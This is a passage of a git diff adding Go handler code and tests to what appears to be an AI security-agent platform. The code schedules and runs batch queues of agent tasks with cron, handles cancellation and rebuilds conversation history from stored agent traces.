h.batchTaskManager.GetBatchQueue(queueID) + c.JSON(http.StatusOK, gin.H{"queue": updated}) +} + +// UpdateBatchQueueSchedule 修改批量任务队列的调度配置(scheduleMode / cronExpr) +func (h *AgentHandler) UpdateBatchQueueSchedule(c *gin.Context) { + queueID := c.Param("queueId") + queue, exists := h.batchTaskManager.GetBatchQueue(queueID) + if !exists { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"}) + return + } + // 仅在非 running 状态下允许修改调度 + if queue.Status == "running" { + c.JSON(http.StatusBadRequest, gin.H{"error": "队列正在运行中,无法修改调度配置"}) + return + } + var req struct { + ScheduleMode string `json:"scheduleMode"` + CronExpr string `json:"cronExpr"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + scheduleMode := normalizeBatchQueueScheduleMode(req.ScheduleMode) + cronExpr := strings.TrimSpace(req.CronExpr) + var nextRunAt *time.Time + if scheduleMode == "cron" { + if cronExpr == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "启用 Cron 调度时,调度表达式不能为空"}) + return + } + schedule, err := h.batchCronParser.Parse(cronExpr) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的 Cron 表达式: " + err.Error()}) + return + } + next := schedule.Next(time.Now()) + nextRunAt = &next + } + h.batchTaskManager.UpdateQueueSchedule(queueID, scheduleMode, cronExpr, nextRunAt) + updated, _ := h.batchTaskManager.GetBatchQueue(queueID) + c.JSON(http.StatusOK, gin.H{"queue": updated}) +} + +// SetBatchQueueScheduleEnabled 开启/关闭 Cron 自动调度(手工执行不受影响) +func (h *AgentHandler) SetBatchQueueScheduleEnabled(c *gin.Context) { + queueID := c.Param("queueId") + if _, exists := h.batchTaskManager.GetBatchQueue(queueID); !exists { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"}) + return + } + var req struct { + ScheduleEnabled bool `json:"scheduleEnabled"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if !h.batchTaskManager.SetScheduleEnabled(queueID, req.ScheduleEnabled) { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"}) + return + } + queue, _ := h.batchTaskManager.GetBatchQueue(queueID) + c.JSON(http.StatusOK, gin.H{"queue": queue}) +} + +// DeleteBatchQueue 删除批量任务队列 +func (h *AgentHandler) DeleteBatchQueue(c *gin.Context) { + queueID := c.Param("queueId") + success := h.batchTaskManager.DeleteQueue(queueID) + if !success { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"}) + return + } + if h.audit != nil { + h.audit.Record(c, audit.Entry{ + Category: "task", + Action: "delete_queue", + Result: "success", + ResourceType: "batch_queue", + ResourceID: queueID, + Message: "删除批量任务队列", + }) + } + c.JSON(http.StatusOK, gin.H{"message": "批量任务队列已删除"}) +} + +// UpdateBatchTask 更新批量任务消息 +func (h *AgentHandler) UpdateBatchTask(c *gin.Context) { + queueID := c.Param("queueId") + taskID := c.Param("taskId") + + var req struct { + Message string `json:"message" binding:"required"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + + if req.Message == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "任务消息不能为空"}) + return + } + + err := h.batchTaskManager.UpdateTaskMessage(queueID, taskID, req.Message) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + // 返回更新后的队列信息 + queue, exists := h.batchTaskManager.GetBatchQueue(queueID) + if !exists { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"}) + return + } + c.JSON(http.StatusOK, gin.H{"message": "任务已更新", "queue": queue}) +} + +// AddBatchTask 添加任务到批量任务队列 +func (h *AgentHandler) AddBatchTask(c *gin.Context) { + queueID := c.Param("queueId") + + var req struct { + Message string `json:"message" binding:"required"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + + if req.Message == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "任务消息不能为空"}) + return + } + + task, err := h.batchTaskManager.AddTaskToQueue(queueID, req.Message) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + // 返回更新后的队列信息 + queue, exists := h.batchTaskManager.GetBatchQueue(queueID) + if !exists { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"}) + return + } + c.JSON(http.StatusOK, gin.H{"message": "任务已添加", "task": task, "queue": queue}) +} + +// DeleteBatchTask 删除批量任务 +func (h *AgentHandler) DeleteBatchTask(c *gin.Context) { + queueID := c.Param("queueId") + taskID := c.Param("taskId") + + err := h.batchTaskManager.DeleteTask(queueID, taskID) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + // 返回更新后的队列信息 + queue, exists := h.batchTaskManager.GetBatchQueue(queueID) + if !exists { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "task", "delete_batch_task", "删除批量子任务", "batch_task", taskID, map[string]interface{}{ + "batch_queue_id": queueID, + }) + } + c.JSON(http.StatusOK, gin.H{"message": "任务已删除", "queue": queue}) +} + +func (h *AgentHandler) markBatchQueueRunning(queueID string) bool { + h.batchRunnerMu.Lock() + defer h.batchRunnerMu.Unlock() + if _, exists := h.batchRunning[queueID]; exists { + return false + } + h.batchRunning[queueID] = struct{}{} + return true +} + +func (h *AgentHandler) unmarkBatchQueueRunning(queueID string) { + h.batchRunnerMu.Lock() + defer h.batchRunnerMu.Unlock() + delete(h.batchRunning, queueID) +} + +func (h *AgentHandler) nextBatchQueueRunAt(cronExpr string, from time.Time) (*time.Time, error) { + expr := strings.TrimSpace(cronExpr) + if expr == "" { + return nil, nil + } + schedule, err := h.batchCronParser.Parse(expr) + if err != nil { + return nil, err + } + next := schedule.Next(from) + return &next, nil +} + +func (h *AgentHandler) startBatchQueueExecution(queueID string, scheduled bool) (bool, error) { + // 先获取执行互斥门,再读取队列状态,避免基于过时快照做判断 + if !h.markBatchQueueRunning(queueID) { + return true, nil + } + + queue, exists := h.batchTaskManager.GetBatchQueue(queueID) + if !exists { + h.unmarkBatchQueueRunning(queueID) + return false, nil + } + + if scheduled { + if queue.ScheduleMode != "cron" { + h.unmarkBatchQueueRunning(queueID) + err := fmt.Errorf("队列未启用 cron 调度") + h.batchTaskManager.SetLastScheduleError(queueID, err.Error()) + return true, err + } + if queue.Status == "running" || queue.Status == "paused" || queue.Status == "cancelled" { + h.unmarkBatchQueueRunning(queueID) + err := fmt.Errorf("当前队列状态不允许被调度执行") + h.batchTaskManager.SetLastScheduleError(queueID, err.Error()) + return true, err + } + if !h.batchTaskManager.ResetQueueForRerun(queueID) { + h.unmarkBatchQueueRunning(queueID) + err := fmt.Errorf("重置队列失败") + h.batchTaskManager.SetLastScheduleError(queueID, err.Error()) + return true, err + } + queue, _ = h.batchTaskManager.GetBatchQueue(queueID) + } else if queue.Status != "pending" && queue.Status != "paused" { + h.unmarkBatchQueueRunning(queueID) + return true, fmt.Errorf("队列状态不允许启动") + } + + if queue != nil && batchQueueWantsEino(queue.AgentMode) && (h.config == nil || !h.config.MultiAgent.Enabled) { + h.unmarkBatchQueueRunning(queueID) + err := fmt.Errorf("当前队列配置为 Eino 多代理,但系统未启用多代理") + if scheduled { + h.batchTaskManager.SetLastScheduleError(queueID, err.Error()) + } + return true, err + } + + if scheduled { + h.batchTaskManager.RecordScheduledRunStart(queueID) + } + h.batchTaskManager.UpdateQueueStatus(queueID, "running") + if queue != nil && queue.ScheduleMode == "cron" { + nextRunAt, err := h.nextBatchQueueRunAt(queue.CronExpr, time.Now()) + if err == nil { + h.batchTaskManager.UpdateQueueSchedule(queueID, "cron", queue.CronExpr, nextRunAt) + } + } + + go h.executeBatchQueue(queueID) + return true, nil +} + +func (h *AgentHandler) batchQueueSchedulerLoop() { + ticker := time.NewTicker(20 * time.Second) + defer ticker.Stop() + for range ticker.C { + queues := h.batchTaskManager.GetLoadedQueues() + now := time.Now() + for _, queue := range queues { + if queue == nil || queue.ScheduleMode != "cron" || !queue.ScheduleEnabled || queue.Status == "cancelled" || queue.Status == "running" || queue.Status == "paused" { + continue + } + nextRunAt := queue.NextRunAt + if nextRunAt == nil { + next, err := h.nextBatchQueueRunAt(queue.CronExpr, now) + if err != nil { + h.logger.Warn("批量任务 cron 表达式无效,跳过调度", zap.String("queueId", queue.ID), zap.String("cronExpr", queue.CronExpr), zap.Error(err)) + continue + } + h.batchTaskManager.UpdateQueueSchedule(queue.ID, "cron", queue.CronExpr, next) + nextRunAt = next + } + if nextRunAt != nil && (nextRunAt.Before(now) || nextRunAt.Equal(now)) { + if _, err := h.startBatchQueueExecution(queue.ID, true); err != nil { + h.logger.Warn("自动调度批量任务失败", zap.String("queueId", queue.ID), zap.Error(err)) + } + } + } + } +} + +// executeBatchQueue 执行批量任务队列 +func (h *AgentHandler) executeBatchQueue(queueID string) { + defer h.unmarkBatchQueueRunning(queueID) + h.logger.Info("开始执行批量任务队列", zap.String("queueId", queueID)) + + for { + // 检查队列状态 + queue, exists := h.batchTaskManager.GetBatchQueue(queueID) + if !exists || queue.Status == "cancelled" || queue.Status == "completed" || queue.Status == "paused" { + break + } + + // 获取下一个任务 + task, hasNext := h.batchTaskManager.GetNextTask(queueID) + if !hasNext { + // 所有任务完成:汇总子任务失败信息便于排障 + q, ok := h.batchTaskManager.GetBatchQueue(queueID) + lastRunErr := "" + if ok { + for _, t := range q.Tasks { + if t.Status == "failed" && t.Error != "" { + lastRunErr = t.Error + } + } + } + h.batchTaskManager.SetLastRunError(queueID, lastRunErr) + h.batchTaskManager.UpdateQueueStatus(queueID, "completed") + h.logger.Info("批量任务队列执行完成", zap.String("queueId", queueID)) + break + } + + // 更新任务状态为运行中 + h.batchTaskManager.UpdateTaskStatus(queueID, task.ID, "running", "", "") + + // 创建新对话 + title := safeTruncateString(task.Message, 50) + batchMeta := audit.ConversationCreateMeta("batch_task") + batchMeta.ProjectID = effectiveProjectID(h.config, queue.ProjectID) + conv, err := h.db.CreateConversation(title, batchMeta) + var conversationID string + if err != nil { + h.logger.Error("创建对话失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(err)) + h.batchTaskManager.UpdateTaskStatus(queueID, task.ID, "failed", "", "创建对话失败: "+err.Error()) + h.batchTaskManager.MoveToNextTask(queueID) + continue + } + conversationID = conv.ID + + // 保存conversationId到任务中(即使是运行中状态也要保存,以便查看对话) + h.batchTaskManager.UpdateTaskStatusWithConversationID(queueID, task.ID, "running", "", "", conversationID) + + // 应用角色用户提示词和工具配置 + finalMessage := task.Message + var roleTools []string // 角色配置的工具列表 + if queue.Role != "" && queue.Role != "默认" { + if h.config.Roles != nil { + if role, exists := h.config.Roles[queue.Role]; exists && role.Enabled { + // 应用用户提示词 + if role.UserPrompt != "" { + finalMessage = role.UserPrompt + "\n\n" + task.Message + h.logger.Info("应用角色用户提示词", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("role", queue.Role)) + } + // 获取角色配置的工具列表(优先使用tools字段,向后兼容mcps字段) + if len(role.Tools) > 0 { + roleTools = role.Tools + h.logger.Info("使用角色配置的工具列表", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("role", queue.Role), zap.Int("toolCount", len(roleTools))) + } + } + } + } + + // 保存用户消息(保存原始消息,不包含角色提示词) + _, err = h.db.AddMessage(conversationID, "user", task.Message, nil) + if err != nil { + h.logger.Error("保存用户消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("conversationId", conversationID), zap.Error(err)) + } + + // 预先创建助手消息,以便关联过程详情 + assistantMsg, err := h.db.AddMessage(conversationID, "assistant", "处理中...", nil) + if err != nil { + h.logger.Error("创建助手消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("conversationId", conversationID), zap.Error(err)) + // 如果创建失败,继续执行但不保存过程详情 + assistantMsg = nil + } + + // 创建进度回调函数,复用统一逻辑(批量任务不需要流式事件,所以传入nil) + var assistantMessageID string + if assistantMsg != nil { + assistantMessageID = assistantMsg.ID + } + // 注意:批量任务没有前端直连的 POST /stream,因此若要支持「刷新后补流」, + // 需要把进度事件镜像到 TaskEventBus(GET /api/agent-loop/task-events 会订阅这里)。 + // progressCallback 将在子任务的 IIFE 内创建,以便拿到 taskCtx/cancelWithCause 与 sendEvent。 + var progressCallback func(eventType, message string, data interface{}) + + // 执行任务(使用包含角色提示词的finalMessage和角色工具列表) + h.logger.Info("执行批量任务", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("message", task.Message), zap.String("role", queue.Role), zap.String("conversationId", conversationID)) + + func() { + // 与对话流式接口一致:同 conversationId 仅允许一个运行中任务,并支持 /api/agent-loop/cancel 与会话锁对齐。 + baseCtx, cancelWithCause := context.WithCancelCause(context.Background()) + // 单个子任务超时:6 小时(与原先 WithTimeout(Background) 一致) + taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 6*time.Hour) + + registered := false + finishStatus := "completed" + + defer func() { + h.batchTaskManager.SetTaskCancel(queueID, nil) + timeoutCancel() + if registered { + // 与流式接口保持一致:结束前补一个 done,便于前端 task-events 侧及时收口 UI。 + if h.taskEventBus != nil { + ev := StreamEvent{Type: "done", Message: "", Data: map[string]interface{}{"conversationId": conversationID}} + if b, err := json.Marshal(ev); err == nil { + h.taskEventBus.Publish(conversationID, append(append([]byte("data: "), b...), '\n', '\n')) + } + } + h.tasks.FinishTask(conversationID, finishStatus) + } + cancelWithCause(nil) + }() + + // 事件镜像:只发布到 TaskEventBus,不直接写 HTTP Response(用于刷新后的补流)。 + sendEvent := func(eventType, message string, data interface{}) { + if h.taskEventBus == nil { + return + } + ev := StreamEvent{Type: eventType, Message: message, Data: data} + b, err := json.Marshal(ev) + if err != nil { + b = []byte(`{"type":"error","message":"marshal failed"}`) + } + line := make([]byte, 0, len(b)+8) + line = append(line, []byte("data: ")...) + line = append(line, b...) + line = append(line, '\n', '\n') + h.taskEventBus.Publish(conversationID, line) + } + + if _, err := h.tasks.StartTask(conversationID, task.Message, cancelWithCause); err != nil { + h.logger.Warn("批量队列子任务注册会话运行状态失败", + zap.String("queueId", queueID), + zap.String("taskId", task.ID), + zap.String("conversationId", conversationID), + zap.Error(err)) + failMsg := err.Error() + if errors.Is(err, ErrTaskAlreadyRunning) { + failMsg = "会话已有任务正在执行,无法在该会话上并行启动批量子任务" + } + h.batchTaskManager.UpdateTaskStatus(queueID, task.ID, "failed", "", failMsg) + return + } + registered = true + // 存储取消函数:暂停队列时取消子任务 context(与原先语义一致) + h.batchTaskManager.SetTaskCancel(queueID, timeoutCancel) + + // 创建进度回调函数:写 DB + 镜像到 task-events,支持刷新后继续流式展示。 + progressCallback = h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent) + taskCtx = mcp.WithMCPConversationID(taskCtx, conversationID) + taskCtx = mcp.WithToolRunRegistry(taskCtx, h.tasks) + + // 使用队列配置的角色工具列表(如果为空,表示使用所有工具) + useBatchMulti := false + batchOrch := "deep" + am := strings.TrimSpace(strings.ToLower(queue.AgentMode)) + if am == "multi" { + am = "deep" + } + if batchQueueWantsEino(queue.AgentMode) && h.config != nil && h.config.MultiAgent.Enabled { + useBatchMulti = true + batchOrch = config.NormalizeMultiAgentOrchestration(am) + } else if queue.AgentMode == "" && h.config != nil && h.config.MultiAgent.Enabled && h.config.MultiAgent.BatchUseMultiAgent { + // 兼容历史数据:未配置队列代理模式时,沿用旧的系统级开关 + useBatchMulti = true + batchOrch = "deep" + } + var resultMA *multiagent.RunResult + var runErr error + switch { + case useBatchMulti: + resultMA, runErr = multiagent.RunDeepAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, h.conversationProjectID(conversationID), finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, h.agentsMarkdownDir, batchOrch, nil, h.projectBlackboardBlock(conversationID)) + default: + if h.config == nil { + runErr = fmt.Errorf("服务器配置未加载") + } else { + resultMA, runErr = multiagent.RunEinoSingleChatModelAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, h.conversationProjectID(conversationID), finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID)) + } + } + + if runErr != nil { + if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { + h.persistEinoAgentTraceForResume(conversationID, resultMA) + } + errStr := runErr.Error() + partialResp := "" + if resultMA != nil { + partialResp = resultMA.Response + } + isCancelled := errors.Is(context.Cause(baseCtx), ErrTaskCancelled) || + errors.Is(runErr, context.Canceled) || + strings.Contains(strings.ToLower(errStr), "context canceled") || + strings.Contains(strings.ToLower(errStr), "context cancelled") || + (partialResp != "" && (strings.Contains(partialResp, "任务已被取消") || strings.Contains(partialResp, "任务执行中断"))) + isTimeout := errors.Is(runErr, context.DeadlineExceeded) || errors.Is(context.Cause(taskCtx), context.DeadlineExceeded) + + if isTimeout { + finishStatus = "timeout" + } else if isCancelled { + finishStatus = "cancelled" + } else { + finishStatus = "failed" + } + + if isCancelled { + h.logger.Info("批量任务被取消", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("conversationId", conversationID)) + cancelMsg := "任务已被用户取消,后续操作已停止。" + // 如果执行结果中有更具体的取消消息,使用它 + if partialResp != "" && (strings.Contains(partialResp, "任务已被取消") || strings.Contains(partialResp, "任务执行中断")) { + cancelMsg = partialResp + } + // 更新助手消息内容 + if assistantMessageID != "" { + if updateErr := h.appendAssistantMessageNotice(assistantMessageID, cancelMsg); updateErr != nil { + h.logger.Warn("更新取消后的助手消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(updateErr)) + } + // 保存取消详情到数据库 + if err := h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil); err != nil { + h.logger.Warn("保存取消详情失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(err)) + } + } else { + // 如果没有预先创建的助手消息,创建一个新的 + _, errMsg := h.db.AddMessage(conversationID, "assistant", cancelMsg, nil) + if errMsg != nil { + h.logger.Warn("保存取消消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(errMsg)) + } + } + h.batchTaskManager.UpdateTaskStatusWithConversationID(queueID, task.ID, "cancelled", cancelMsg, "", conversationID) + } else { + h.logger.Error("批量任务执行失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("conversationId", conversationID), zap.Error(runErr)) + errorMsg := "执行失败: " + runErr.Error() + // 更新助手消息内容 + if assistantMessageID != "" { + if _, updateErr := h.db.Exec( + "UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", + errorMsg, + time.Now(), assistantMessageID, + ); updateErr != nil { + h.logger.Warn("更新失败后的助手消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(updateErr)) + } + // 保存错误详情到数据库 + if err := h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errorMsg, nil); err != nil { + h.logger.Warn("保存错误详情失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(err)) + } + } + h.batchTaskManager.UpdateTaskStatus(queueID, task.ID, "failed", "", runErr.Error()) + } + } else { + h.logger.Info("批量任务执行成功", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("conversationId", conversationID)) + + resText := resultMA.Response + mcpIDs := resultMA.MCPExecutionIDs + lastIn := resultMA.LastAgentTraceInput + lastOut := resultMA.LastAgentTraceOutput + + // 更新助手消息内容 + if assistantMessageID != "" { + if updateErr := h.db.UpdateAssistantMessageFinalize(assistantMessageID, resText, mcpIDs, multiagent.AggregatedReasoningFromTraceJSON(lastIn)); updateErr != nil { + h.logger.Warn("更新助手消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(updateErr)) + // 如果更新失败,尝试创建新消息 + _, err = h.db.AddMessage(conversationID, "assistant", resText, mcpIDs) + if err != nil { + h.logger.Error("保存助手消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("conversationId", conversationID), zap.Error(err)) + } + } + } else { + // 如果没有预先创建的助手消息,创建一个新的 + _, err = h.db.AddMessage(conversationID, "assistant", resText, mcpIDs) + if err != nil { + h.logger.Error("保存助手消息失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("conversationId", conversationID), zap.Error(err)) + } + } + + // 保存代理轨迹 + if lastIn != "" || lastOut != "" { + if err := h.db.SaveAgentTrace(conversationID, lastIn, lastOut); err != nil { + h.logger.Warn("保存代理轨迹失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(err)) + } else { + h.logger.Info("已保存代理轨迹", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("conversationId", conversationID)) + } + } + + // 保存结果 + h.batchTaskManager.UpdateTaskStatusWithConversationID(queueID, task.ID, "completed", resText, "", conversationID) + } + }() + + // 移动到下一个任务 + h.batchTaskManager.MoveToNextTask(queueID) + + // 检查是否被取消或暂停 + queue, _ = h.batchTaskManager.GetBatchQueue(queueID) + if queue.Status == "cancelled" || queue.Status == "paused" { + break + } + } +} + +// loadHistoryFromAgentTrace 从库中保存的代理消息轨迹恢复历史(列 last_react_*;含单代理与 Eino)。 +// 逻辑与攻击链一致:优先用已保存的 JSON 消息带 + 最后一轮助手摘要,否则回退消息表。 +func (h *AgentHandler) loadHistoryFromAgentTrace(conversationID string) ([]agent.ChatMessage, error) { + traceInputJSON, assistantOut, err := h.db.GetAgentTrace(conversationID) + if err != nil { + return nil, fmt.Errorf("获取代理轨迹失败: %w", err) + } + + if traceInputJSON == "" { + return nil, fmt.Errorf("代理轨迹为空,将使用消息表") + } + + dataSource := "database_last_agent_trace" + + var messagesArray []map[string]interface{} + if err := json.Unmarshal([]byte(traceInputJSON), &messagesArray); err != nil { + return nil, fmt.Errorf("解析代理轨迹 JSON 失败: %w", err) + } + + messageCount := len(messagesArray) + + h.logger.Info("使用保存的代理轨迹恢复历史上下文", + zap.String("conversationId", conversationID), + zap.String("dataSource", dataSource), + zap.Int("traceInputSize", len(traceInputJSON)), + zap.Int("messageCount", messageCount), + zap.Int("assistantOutSize", len(assistantOut)), + ) + // fmt.Println("messagesArray:", messagesArray)//debug + + // 转换为Agent消息格式 + agentMessages := make([]agent.ChatMessage, 0, len(messagesArray)) + for _, msgMap := range messagesArray { + msg := agent.ChatMessage{} + + // 解析role + if role, ok := msgMap["role"].(string); ok { + msg.Role = role + } else { + continue // 跳过无效消息 + } + + // 跳过 system 消息(由 Eino Instruction 提供) + if msg.Role == "system" { + continue + } + + // 解析content + if content, ok := msgMap["content"].(string); ok { + msg.Content = content + } + // DeepSeek 思考模式:含工具调用的 assistant 须在后续请求中回传 reasoning_content + if rc, ok := msgMap["reasoning_content"].(string); ok && strings.TrimSpace(rc) != "" { + msg.ReasoningContent = rc + } + + // 解析tool_calls(如果存在) + if toolCallsRaw, ok := msgMap["tool_calls"]; ok && toolCallsRaw != nil { + if toolCallsArray, ok := toolCallsRaw.([]interface{}); ok { + msg.ToolCalls = make([]agent.ToolCall, 0, len(toolCallsArray)) + for _, tcRaw := range toolCallsArray { + if tcMap, ok := tcRaw.(map[string]interface{}); ok { + toolCall := agent.ToolCall{} + + // 解析ID + if id, ok := tcMap["id"].(string); ok { + toolCall.ID = id + } + + // 解析Type + if toolType, ok := tcMap["type"].(string); ok { + toolCall.Type = toolType + } + + // 解析Function + if funcMap, ok := tcMap["function"].(map[string]interface{}); ok { + toolCall.Function = agent.FunctionCall{} + + // 解析函数名 + if name, ok := funcMap["name"].(string); ok { + toolCall.Function.Name = name + } + + // 解析arguments(可能是字符串或对象) + if argsRaw, ok := funcMap["arguments"]; ok { + if argsStr, ok := argsRaw.(string); ok { + // 如果是字符串,解析为JSON + var argsMap map[string]interface{} + if err := json.Unmarshal([]byte(argsStr), &argsMap); err == nil { + toolCall.Function.Arguments = argsMap + } + } else if argsMap, ok := argsRaw.(map[string]interface{}); ok { + // 如果已经是对象,直接使用 + toolCall.Function.Arguments = argsMap + } + } + } + + if toolCall.ID != "" { + msg.ToolCalls = append(msg.ToolCalls, toolCall) + } + } + } + } + } + + // 解析tool_call_id(tool角色消息) + if toolCallID, ok := msgMap["tool_call_id"].(string); ok { + msg.ToolCallID = toolCallID + } + if tn, ok := msgMap["tool_name"].(string); ok && strings.TrimSpace(tn) != "" { + msg.ToolName = strings.TrimSpace(tn) + } else if tn, ok := msgMap["name"].(string); ok && strings.TrimSpace(tn) != "" && strings.EqualFold(msg.Role, "tool") { + msg.ToolName = strings.TrimSpace(tn) + } + + agentMessages = append(agentMessages, msg) + } + + // 若存在 last_react_output(助手摘要),合并为最后一条 assistant(与保存格式一致) + if assistantOut != "" { + if len(agentMessages) > 0 { + lastMsg := &agentMessages[len(agentMessages)-1] + if strings.EqualFold(lastMsg.Role, "assistant") && len(lastMsg.ToolCalls) == 0 { + lastMsg.Content = assistantOut + } else { + agentMessages = append(agentMessages, agent.ChatMessage{ + Role: "assistant", + Content: assistantOut, + }) + } + } else { + agentMessages = append(agentMessages, agent.ChatMessage{ + Role: "assistant", + Content: assistantOut, + }) + } + } + + if len(agentMessages) == 0 { + return nil, fmt.Errorf("从代理轨迹解析的消息为空") + } + + if h.agent != nil { + if fixed := h.agent.RepairOrphanToolMessages(&agentMessages); fixed { + h.logger.Info("修复了从代理轨迹恢复的历史消息中的失配 tool 消息", + zap.String("conversationId", conversationID), + ) + } + } + + h.logger.Info("从代理轨迹恢复历史消息完成", + zap.String("conversationId", conversationID), + zap.String("dataSource", dataSource), + zap.Int("originalMessageCount", messageCount), + zap.Int("finalMessageCount", len(agentMessages)), + zap.Bool("hasAssistantOut", assistantOut != ""), + ) + return agentMessages, nil +} + +// dbMessagesToAgentChatMessages maps DB rows to agent ChatMessage for history fallback +// (includes reasoning_content for DeepSeek thinking + tool replay). +func dbMessagesToAgentChatMessages(msgs []database.Message) []agent.ChatMessage { + out := make([]agent.ChatMessage, 0, len(msgs)) + for i := range msgs { + m := msgs[i] + out = append(out, agent.ChatMessage{ + Role: m.Role, + Content: m.Content, + ReasoningContent: m.ReasoningContent, + }) + } + return out +} diff --git a/internal/handler/agent_progress_callback_test.go b/internal/handler/agent_progress_callback_test.go new file mode 100644 index 00000000..6eb13e31 --- /dev/null +++ b/internal/handler/agent_progress_callback_test.go @@ -0,0 +1,99 @@ +package handler + +import ( + "context" + "fmt" + "os" + "path/filepath" + "sync" + "testing" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/openai" + + "go.uber.org/zap" +) + +// TestCreateProgressCallback_ConcurrentToolEvents 回归 issue #142:并行 tool 回调不得 concurrent map panic。 +func TestCreateProgressCallback_ConcurrentToolEvents(t *testing.T) { + logger := zap.NewNop() + h := &AgentHandler{ + logger: logger, + config: &config.Config{}, + } + cb := h.createProgressCallback(context.Background(), nil, "conv-race-test", "", nil) + + const workers = 64 + var wg sync.WaitGroup + wg.Add(workers * 2) + for i := 0; i < workers; i++ { + i := i + go func() { + defer wg.Done() + toolCallID := fmt.Sprintf("tc-%d", i) + cb("tool_call", "calling skill", map[string]interface{}{ + "toolCallId": toolCallID, + "toolName": "skill", + "argumentsObj": map[string]interface{}{"skill_name": "demo-skill"}, + }) + }() + go func() { + defer wg.Done() + toolCallID := fmt.Sprintf("tc-%d", i) + cb("tool_result", "skill done", map[string]interface{}{ + "toolCallId": toolCallID, + "toolName": "skill", + "success": true, + }) + }() + } + wg.Wait() +} + +// TestCreateProgressCallback_FlushesReasoningOnDone 流式推理聚合须在 done/response 时落库,刷新后可回放。 +func TestCreateProgressCallback_FlushesReasoningOnDone(t *testing.T) { + tmp := t.TempDir() + db, err := database.NewDB(filepath.Join(tmp, "test.sqlite"), zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer os.RemoveAll(tmp) + + conv, err := db.CreateConversation("test", database.ConversationCreateMeta{}) + if err != nil { + t.Fatalf("CreateConversation: %v", err) + } + asst, err := db.AddMessage(conv.ID, "assistant", "处理中...", nil) + if err != nil { + t.Fatalf("AddMessage: %v", err) + } + + h := &AgentHandler{logger: zap.NewNop(), db: db} + cb := h.createProgressCallback(context.Background(), nil, conv.ID, asst.ID, nil) + + streamID := "eino-reasoning-test-1" + cb("reasoning_chain_stream_start", " ", map[string]interface{}{ + "streamId": streamID, + "source": "eino", + }) + cb("reasoning_chain_stream_delta", "step one", openai.WithSSEAccumulated(map[string]interface{}{ + "streamId": streamID, + }, "step one")) + cb("done", "", map[string]interface{}{"conversationId": conv.ID}) + + details, err := db.GetProcessDetails(asst.ID) + if err != nil { + t.Fatalf("GetProcessDetails: %v", err) + } + found := false + for _, d := range details { + if d.EventType == "reasoning_chain" && d.Message == "step one" { + found = true + break + } + } + if !found { + t.Fatalf("expected reasoning_chain persisted on done, got %+v", details) + } +} diff --git a/internal/handler/attackchain.go b/internal/handler/attackchain.go new file mode 100644 index 00000000..837516e8 --- /dev/null +++ b/internal/handler/attackchain.go @@ -0,0 +1,172 @@ +package handler + +import ( + "context" + "net/http" + "sync" + "time" + + "cyberstrike-ai/internal/attackchain" + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// AttackChainHandler 攻击链处理器 +type AttackChainHandler struct { + db *database.DB + logger *zap.Logger + openAIConfig *config.OpenAIConfig + mu sync.RWMutex // 保护 openAIConfig 的并发访问 + // 用于防止同一对话的并发生成 + generatingLocks sync.Map // 